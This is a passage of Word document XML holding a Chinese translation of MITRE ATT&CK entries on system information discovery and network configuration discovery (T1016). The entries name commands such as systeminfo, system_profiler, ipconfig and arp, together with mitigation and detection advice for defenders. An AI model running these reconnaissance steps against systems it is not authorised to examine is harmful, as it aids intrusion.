          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务包和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>架构</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E189BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E237A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>获取此信息的示例命令和实用程序包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
          </w:rPr>
          <w:t>Systeminfo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用于基于当前文件和目录识别信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0853D711" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E4F31" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>systemsetup</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以列出</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的详细</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分解信息</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>此命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>system_profiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可以</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常详细地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分解</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已安装的卷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件以及许多其他内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>命令不需要提升权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0BE21" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEABBBA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013089D8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24CA95" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247C88EE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00106D6C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DC663" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络配置</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="3AE70318" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D09916" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1016</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588DA1A7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7F7A81" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518B83D9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704E05A1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3ADD9B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId184" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007526C7">
                <w:t>CAPEC-309</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="007526C7">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795487B4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B6E8F8D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00500AA2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B85FA46" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找他们</w:t>
      </w:r>
      <w:r>
        <w:t>所访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的详细网络</w:t>
      </w:r>
      <w:r>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和设置</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或通过</w:t>
      </w:r>
      <w:r>
        <w:t>远程系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术来查找。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在几个可用于收集此信息的操作系统管理实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Arp</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipconfig / ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nbtstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6D50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF3868" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4783B3B0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229152D6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23A4CC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7603C5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
